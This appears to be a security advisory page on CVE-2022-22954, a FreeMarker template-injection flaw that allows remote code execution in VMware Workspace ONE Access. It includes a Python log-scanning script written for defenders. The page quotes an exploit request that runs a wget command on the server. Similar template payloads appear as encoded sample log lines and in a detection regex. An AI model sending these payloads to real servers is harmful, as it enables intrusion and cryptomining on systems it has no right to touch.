
Common Vulnerabilities and Exposures – CVE-2022-22954 VMware Workspace ONE Access and Identity Manager

CVE-2022-22954 VMware Workspace ONE Access and Identity Manager – remote code execution vulnerability

VMware Workspace ONE Access and Identity Manager are affected by a remote code execution vulnerability. Attackers use Remote Code Execution (RCE) vulnerabilities to gain access to a target system from a remote location. This can be done by abusing an existing injection mechanism within a product, for example the PHP or SQL requests made when retrieving data from a server: the attacker embeds their own code through XSS or SQL injection methods, and that code is then interpreted and processed by the language in question. Once this code is processed, the attacker can either inject malicious code into the product or retrieve sensitive information.

In VMware’s particular case, attackers are able to inject this code through a server-side template and use it to infect servers for cryptocurrency mining. A server-side template comes into play when user input is embedded in a template of some form and then processed by the target application. In this case, a server-side template utility called ‘FreeMarker’ can be exploited to inject code into the product. An example request, from Bad Packets, is shown below.

"GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - (RCE)")} HTTP/1.1"

As for a resolution, VMware advises applying the latest patches. This is a Critical-level vulnerability, scoring a 10 on the CVSS scale.
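
For defenders reviewing access logs, the following is an added detection example (not from Bad Packets or VMware) that flags requests to the path quoted above when the deviceUdid parameter carries FreeMarker template syntax, including percent-encoded and double-encoded forms. The log lines are constructed samples in an assumed combined-log style, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote

# Path and parameter come from the request quoted on this page.
TARGET_PATH = "/catalog-portal/ui/oauth/verify"
TARGET_PARAM = "deviceUdid"
# FreeMarker interpolation/directive openers and its utility package name.
TEMPLATE_MARKERS = re.compile(r"\$\{|<#|freemarker\.template\.utility", re.I)
# Greedy match: quotes or spaces inside the URL must not cut the request short.
REQUEST_RE = re.compile(r'"(?:GET|POST) (.*) HTTP/\d(?:\.\d)?"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_ssti_probe(log_line):
    """True if the line hits TARGET_PATH with template syntax in TARGET_PARAM."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return False
    path, _, query = match.group(1).partition("?")
    if fully_decode(path).rstrip("/") != TARGET_PATH:
        return False
    values = parse_qs(query, keep_blank_values=True).get(TARGET_PARAM, [])
    return any(TEMPLATE_MARKERS.search(fully_decode(v)) for v in values)

# Constructed sample lines (documentation IPs; "(RCE)" is the page's own redaction).
SAMPLE_LOG = [
    '203.0.113.5 - - [14/Apr/2022:10:00:00 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=3f2a9c71 HTTP/1.1" 200 512',
    r'198.51.100.7 - - [14/Apr/2022:10:01:00 +0000] "GET /catalog-portal/ui/oauth/verify'
    r'?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"(RCE)\")} HTTP/1.1" 400 0',
    '198.51.100.8 - - [14/Apr/2022:10:02:00 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew()(%22(RCE)%22)%7D HTTP/1.1" 400 0',
    '198.51.100.9 - - [14/Apr/2022:10:03:00 +0000] "GET /catalog-portal/ui/oauth/verify'
    '?error=&deviceUdid=%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew()%257D HTTP/1.1" 400 0',
]

def scan(lines):
    """Return the client address (first field) of every flagged line."""
    return [line.split()[0] for line in lines if is_ssti_probe(line)]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit shows only that the request was received; whether the server was affected depends on its patch level, so flagged sources should be checked against VMware's patch guidance.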
